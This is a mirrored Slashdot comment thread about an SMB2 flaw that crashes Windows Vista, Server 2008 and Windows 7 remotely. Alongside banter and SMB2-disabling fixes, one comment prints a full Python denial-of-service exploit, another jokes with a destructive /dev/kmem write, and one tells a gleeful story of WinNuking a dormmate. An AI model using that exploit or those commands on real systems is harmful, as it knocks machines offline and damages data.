Slashdot Mirror
Windows 7 Reintroduces Remote BSoD
David Gerard writes "Remember the good old days of the 1990s, when you could teardrop attack any Windows user who'd annoyed you and bluescreen them? Microsoft reintroduces this popular feature in Windows 7, courtesy the rewritten TCP/IP and SMB2 stacks. Well done, guys! Another one for the Windows 7 Drinking Game."
If it relies on a SMB2 request it is most likely restricted form request inside the LAN.
Either way, still bad.
...half the world is behind a NAT setup now, and the other half has Windows firewall enabled. Windows update exists now so people will be able to patch quickly and easily when a patch arrives.
Realistically this isn't going to effect many people like the old exploit did.
Still, it's quite comical, maybe this is Microsoft's take on the saying "The old ones are the best". So much for their secure development practices, there's really no excuse for them not picking this one up before release.
It's incredibly unlikely to ever affect anyo
http://twitter.com/onion2k
need to rebind a key in fluxbox and dig out my "spank" keycap from 2003....this exploit was pretty effective though, being the modern day equivalent of a highway driver with a tow missile.
Good people go to bed earlier.
- Shiny-new interface.
- No annoying "are you sure" popups every 30 seconds like Vista.
- Can run on a 1 gigabyte machine without slowing to a crawl.
It simply wasn't possible for Microsoft to make such a great perfect OS without including a flaw.
"I disapprove of what you say, but I will defend to the death your right to say it." - historian Evelyn Beatrice Hall
Yeah, we read the first three lines of the Wikipedia link, too.
It is by my will alone my thoughts acquire motion; it is by the juice of the coffee bean that the thoughts acquire speed
Although I don't think Windows 7's feature list is stable yet, and I expect to see this one pulled before the release.
Pity.
Having actually tried this on three windows 7 machines now, it doesn't seem to work on every machine. (Actually, it's yet to work on any here, although I hear tell that it does work on some). There's something more to this than just "that data crashes it every time".
"Commodore Amiga is better!"
"No Atari ST is better!"
"No Amiga!"
"No Atari!"
"Amiga!"
"Atari!"
Oh that's not the debate you were looking for? Sorry. Let me update that ancient debate for the modern world:
"Apple Macintosh is better!"
"No Microsoft PC is better!"
"No Apple!"
"No Microsoft!"
"Apple!"
"Microsoft!"
(and ancient debate... just as juvenile today as it was 20 years ago)
"I disapprove of what you say, but I will defend to the death your right to say it." - historian Evelyn Beatrice Hall
I was terribly unfair to Microsoft in the story summary (which is pretty much what I wrote) - per TFA, this flaw is actually an exciting new feature of Vista, not of Windows 7.
And before anyone says "but Win7 is beta!" - this flaw is present in the gold master.
http://rocknerd.co.uk
...that my fellow Boston Public School graduates are writing for seclists.org.
Section V: "An attacker can remotly crash without no user interaction, any Vista/Windows 7 machine with SMB enable. "
Yes, because we been done had seen that explot in the pasts.
Dear $DEITY, are there no proof readers or editors alive on these sites?
they don't like introducing "new" things
A slight correction, they like to introduce new things when it suits them. Why the rewrite of SMB into SMB2? Well, it has some technological advantages you would expect but according to Wikipedia:
SMB 2 has two big benefits to Microsoft. The first is clear intellectual property ownership. SMB 1 was originally designed by IBM and was shipped on a wide variety of non-Windows operating systems such as SCO Xenix, OS/2 and DEC VMS (Pathworks). It was partially standardised by X/Open and also had draft standards for IETF which lapsed. (See http://ubiqx.org/cifs/Intro.html for historical detail).
The second benefit is a clean break. Microsoft's SMB1 code has to work with a huge variety of SMB clients and servers. A large number of items in the protocol are optional (such as short and long filenames), there are many infolevels for commands (selecting what structure is returned to a particular request), Unicode was a later addition etc. With SMB2 there is significantly reduced compatibility testing (currently only other Windows Vista clients and servers). Additionally the code is a lot less complex since there is far less variability (e.g. there is no need to worry about having Unicode and non-Unicode code paths as SMB2 requires Unicode support).
So you can see they like to introduce new things when it means they have clear intellectual property ownership rights over it and also a lot less work for them. They also don't have to be backwards compatible with their own products.
While SAMBA 4.0 has experimental support for SMB2 interfacing, I'm guessing the "clear intellectual property" could spell trouble moving forward for Tridgell and the SAMBA team.
My work here is dung.
Let me Loony Tunes that up for you:
Wabbit Season!
Duck Season!
Wabbit Season!
Duck Season!
Summation 2
IT departments are going to keep everything patched, and individuals aren't going to do it to themselves on their LANS. Between firewalls and NATs, it's not going to happen over the internet. Really, the only situation that I can imagine this happening is perhaps on a university network.
Don't take life so seriously. No one makes it out alive.
Hi. I'm an adult. I work as a software engineer.
I cannot join in with the Linux community because of you people. You're just *too awful*. Instead of accepting that this stuff happens and it's bad, you childishly nerdsnort and start writing Microsoft with a dollar sign instead of an S, acting as if this stuff is some amazing manifestation of idiocy rather than a likely consequence of using a mainstream OS developed with time and budgetary constraints. It's going to have stupid bugs. Get the fuck over it.
I would like to join in with the Linux community, but all I ever hear is this pathetic nyerr-nyerr-nyerr garbage.
If you want to attract intelligent, grown-up people to Linux you need to stop doing certain things.
1) Don't act as if users of other operating systems are less intelligent than you. It turns out that Linux-advocacy isn't the entire world, and that leaders in different fields (or even this one!) might be using Windows. They're not "lusers", they just have priorities different from your own.
2) Don't act as if Linux hasn't had equally stupid stuff happen to it. Yes, it's a different process altogether, and I would dare say that bugs are less likely due to its open source nature, but they still happen. One that I can remember off the top of my head is Debian's guessable SSL keys.
3) Try—for ten minutes—to give the impression that half of your time isn't devoted to bashing an OS you believe is irrelevant.
4) For good measure try cutting out the xkcd worship and meme-spouting. We might be able to relate to you people if you acted as if you weren't cut from the same distasteful mold.
"And not exploitable out of the box since SMB and SMBv2 are both firewalled"
What do you mean, is this firewall the software one built into Vista or an external one. If so thn it's relying on the same TCP/IP stack to protect it.
Vulnerable systems are all with SMB2 drivers: Vista, W7 and probably Server 2008
:) normal value should be "\x00\x00"
/joke
The exploit (which is actually ridiculously simple) goes as follows:
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: -->
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
Current problem solution: disable the SMB protocol on your infrastructure..
Now please excuse me, I have go and play a bit with our network admin..
No we didn't. Shut up.
Ooohhhhh, my head.
It's NOT me! It's the meds! I'm on 1000mg of Fukitol.
Or to be more apt (for slashdot)... some people prefer Ford, some prefer Dodge, others still prefer Toyota. Gas is better for some applications, while Diesel is better for others, while electric is better for others.
When a new car line comes out, new defects are to be expected on occasion. Sometimes there are even defects present that were fixed in previous models.
I love it when Slashdot can't post an accurate headline. This is a flaw in SMB 2.0, which is present in Windows Vista, Windows Server 2008, Windows 7, and probably Windows Server 2008 R2 as well. This is not new to 7, it's a common flaw in all the implementations of SMB 2.0. XP isn't affected because XP can't speak that protocol.
When in danger or in doubt, run in circles, scream and shout. --Robert A. Heinlein
The article makes it seem like it hasn't been in Windows since Windows NT and that Windows 7 is the first time it's reappeared. Seriously, Vista has it.
Is this a case of "It's after midnight, must post another slam on Microsoft, even if we have twist and stretch like taffy to make the case"?
It wouldn't be so bad but the body of the submission is incredibly slanted, almost more than some of the replies.
Politics is the art of looking for trouble, finding it everywhere, diagnosing it incorrectly and applying the wrong fix.
Let us hope Samba does not replicate this with its SMB2 Server.
Comment removed based on user account deletion
Speaking of going back to the '90s...
Why is /. using frames?
Oh, I'm sure on the back end it's some web 2.0 dynamic XCSS crap, but on the front end, it looks like a frame, it walks like a frame, it quacks like a frame.
It's a frame.
In firefox 3, I go to slashdot.org. Then I click a link to the IT section. Browser address bar still reads "slashdot.org" (no IT.)
I click a story link, then click the back button.
The browser goes back to slashdot.org, not it.slashdot.org.
Seriously, WTF?
Out of any sufficiently large community, some will engage in the sort of things you describe, or similar or complementary things. Corporate marketing campaigns are largely relying upon evoking those sentiments in the people they target (irrational 'we're #1' mentality without substantial real justification).
1) The chances of making every last Linux user refrain from that are about as likely as having every last Windows user refrain from considering every last willing Linux user an elitist snob who engages in what you describe.
2) That is true, though the severity of your example is far far less bad. I would use one of the various local privelege escalation vulnerabilities (some which were in the kernel undiscovered almost as long as this was in Windows), though even that isn't quite as severe as an unprivileged remote access crash in some measures (in others, admittedly, DoS is much less bad than privilege escalation, though I rarely hear of Windows infrastructures banking on avoiding local privilege escalation much).
3) Again, this may be true of some of the community, it is also true of Windows community (look at a few random message boards, you'll see windows users looking equally foolish)
4) I don't see a correlation between meme-spouting and linux usage. I also see no evidence that Linux people like xkcd any more than non-linux people (though I don't see how xkcd is construed as a particularly bad thing).
In short, if you want a community larger than 30-50 people that is completely devoid of people who fail to meet your standards, you might as well give up on any community.
XML is like violence. If it doesn't solve the problem, use more.
But none of those vehicles are self crashing.
Change is certain; progress is not obligatory.
So I'm reading a lot about this is no big deal because most places have it firewalled off, or most people are behind NAT, etc, etc...
OK, well, tell that to a place like a college that has 50,000 student accounts who all need access to file servers to get their files. You can't just turn off file sharing or block them on the firewall. All it takes is for one 1337 user to show off his mighty hacker skillz by BSOD'ing the servers to ruin things.
At least where I work we are still at 2003 Server -- thankfully.
see this http://www.heise.de/security/Luecke-in-Windows-Vista-und-7-ermoeglicht-Neustart-aus-der-Ferne--/news/meldung/144986 (german) heise tested the avaliable expoit and found vista affected but not windows 7
hahaha only on slashdot would that be modded 'informative'
nice work :)
When this packet hits a pocket on a socket on a port,
Your whole damn OS pauses to abort...
kmem russian roulette: Aquillar> dd if=/dev/urandom of=/dev/kmem bs=1 count=1 seek=$RANDOM
... this can't be possible. Windows is made by *professionals*. If anything, those Linux amateurs are just trying to smear Microsoft with lies. .... jokes aside... It's a shame that microsoft has so much fackin revenue and yet their products are always seemingly half-assed. Throw another million at it! The guy who discovered this exploit should be on your payroll! ... oh wait.. the execs and stockholders aren't rich enough yet!
I wonder how the math works out when comparing advertising and investing in politicians (lobbies) vs developing a solid product in terms of ROI.
My favorite SMB2 exploits are detailed here.
Unfortunately, any group tends to have it's selection of self-important, infantile, self-righteous whiners. Equally unfortunately, they tend to be the more vocal members of said groups.
Don't let the leetiods scare you off, there are plenty of sane linux users or admins around here. Filter out the rest and all will be well.
Mind you, Linux is for those that have a reason to use it (even if the reason is just curiosity), so exempting the leetiots perhaps you need a stronger reason yet to "join the community," just don't worry that a frontal lobotomy is a requirement for such.
'Cause this can be prevented pretty easily by blocking the SMB ports, and if you're a business you'd be insane not to have a firewall anyway.
I've abandoned my search for truth; now I'm just looking for some useful delusions.
Back in October 1998, Microsoft fixed a vulnerability in Internet Explorer 4 where a dotless IP address (represented as a single, unsigned 32-bit integer, which was legal in IPv4) would be treated as being on the local network rather than on the Internet at large. Basically, their programmers took a shortcut and assumed "no dots = local". (MS98-016)
This was re-introduced in IE 5 three years later and had to be fixed AGAIN. (MS01-051)
I've been waiting to see if they end up re-introducing this one, or if they learned their lesson well enough the last time.
As Joel Spolsky points out, this is exactly what happens when you rewrite software. The old software had lots of bug fixes. If your development shop made a particular mistake once, it's likely to do it again when you reimplement. It's unclear whether this was the case for IE 5 (no idea if that area of the code was rewritten), but it seems like this may have bitten Microsoft with the teardrop vulnerability.
Me and my coworker tried this on an updated Windows 2008 today and none of us could believe what happened. The server just dies mid-air and throws a proud BSOD.
Am i the only one surprised something like this could slip through all the supposed testing done by Microsoft? Have they even ran a fuzzer against their code at all? If blatantly obvious holes like this goes unseen in the new TCP/IP SMB2 code rest assured a whole slew of new holes will be found later.
Funniest thing is that this dont affects XP while Microsoft touts Windows 7/2008 as the safest os ever. I guess its all marketing and just blatantly nothing done about security other than to blame everything on the user by passing every security decission onto the user with UAC.
HTTP/1.1 400
I've only been able to get this to work against Vista Ultimate SP2 and Windows Server 2008 SP2. I've not gotten this to work on Windows 7 RTM and Windows 2008 RTM yet... and yes, I disable the firewalls to be sure.
Watch out Marty....the Flux capacitor is at full capacity and a Smurf attack is imminent!
WTF? Over?
I think you'd get alcohol poisoning half-way through the drinking game.
But I have fond memories of the exploit called Win Nuke to cause the BSOD. Back in the day, I was a freshman in college and a football player on our floor was continuously giving me a hard time. In those days, we telnetted into the DEC Alpha to check our email. Also, in those days our IPs were statically assigned and we had no firewall. Those were quite obviously better, more trusting days of the internet. Anyhow, one day I waited until I knew he was in his room and checking email from his computer. I used finger on UNIX to get his IP address. Then, nuke away! I could here him banging, cussing, and throwing his stuff around. So, whenever I needed a little fun, I simply delivered that little exploit. One day he came back from a drunken binge and went to check his email and I felt it was a perfect time to test his patience level. After carefully delivering the little packet, I heard a smashing sound. My guess is he decided to do a body slam, WWF style, on his PC. As I walked by I casually asked what happened as I saw the computer smashed to smithereens. He told me to, "Get outta here, shit nugget!" It was all I could do to keep from bursting out laughing. Moral: Leave the IT guy alone.
Not tested, but Petri is a pretty solid resource: http://www.petri.co.il/how-to-disable-smb-2-on-windows-vista-or-server-2008.htm
body massage!
I dont care im still very found of 7 (running rtm for a month was a pleasant experience) im actually signed up to throw a party, although I wont throw any party I just want free copy of 7 lol. Everything OS isnt perfect 7 is definitely a nice change of pace from XP, and Vista like ME should be forgotten asap.
Visit my Forums?
Just to clarify the comment prior to mine...
Simply adding a linefeed in the right place in the comment would perform the import properly. In other words, the GP post says:
and it should be
I love it when Microsoft self-sabotages. Windows 7 was already being called "Vista: Fixed"; now it's introducing fun new ways for "Vista" to fail. But let's be fair to Microsoft; they don't like introducing "new" things, so in tune with this philosophy, they're merely re-releasing an old problem and packaging it differently ;)
This is actually introduced with Vista, and not Win7 -- making the title and summary just wrong. Something new and different for /....
Ummm... well done and truly informative, the way you copied and pasted directly from the security bulletin linked to in TFS...
Back in the mid/late 90's, we had a Btrieve-based app running on our Novell network. The client app ran on each local workstation, Win95 at the time. One of the resident computer experts (helpdesk guy) discovered a "tool" that would allow him to send the ping o'death to any machine on the network. He amused himself merrily, randomly crashing machines for nearly a week. Problem was, each time he crashed a machine, the Btrieve database would get corrupted or records would be left locked, requiring intervention by me to get things working again. Once I figured out who was doing it, I warned him to stop. He didn't, so I reported him to senior management. He was fired immediately.
Of course it is _VERY_SERIOUS_, un-priviliged user-land electively crashes kernel of every machine it can route TCP packets to, WTF are you stupid or something?
Ah the good old days of early IRC, watching people go poof on a regular basis.
---- Booth was a patriot ----
I've just tested it on 3 of my Server 2008 R2 machines here (final build, technet ftw). It was unable to crash any of them. I wonder if 2008R2 has any new SMB code we don't know about yet?
Note: all 3 2008R2 machines have open (guest-authable) fileshares available via SMB.
What's wrong Twitter? All of your accounts in karma hell? BTW, your suicide comment you made only shows your stupidity.
Friends don't help friends install Communist Linsux.
SMB2 is not required, it can be disabled.
From an Administrative prompt issue the follow:
"net stop mrxsmb20"
To make the change permanent, also issue:
"sc config lanmanworkstation depend= bowser/mrxsmb10/nsi"
"sc config mrxsmb20 start= disabled"
Seriously, why is everyone getting so bent over something that is a three-line permanent fix?
FOOL! You're NOT supposed to PROVIDE THE FIX!!!!!!!!
I can already see the script-kiddy whordes descending on your post!!!!!
That's one way to crash a Windows 7 party.
Also, it isn't related to the TCP/IP stacks, or the teardrop attack. It is a totally unrelated except that it causes a BSoD.
There are times like the recent article about how Microsoft photoshopped a black guy out of some marketing material destined for Poland where there are no black people, where the frantic voices of slashdot bashing Microsoft I find irrational and too strident.
And then there are the far more numerous articles where there's some real problem with a current Microsoft product where some people feel determined to defend Microsoft no matter how much they must stretch reason or reach to find offense in the poster.
Your post is more of the latter than the former -- and so I must wonder how it became moderated so well. Twice interesting and once overrated. That's maybe more than I would give it.
Help stamp out iliturcy.
Tested this on my own system, using my Linux dev box to attack Windows 7 running inside VirtualBox 3. No luck, Windows just sits there.
What's a BSoD?
I am not devoid of humor.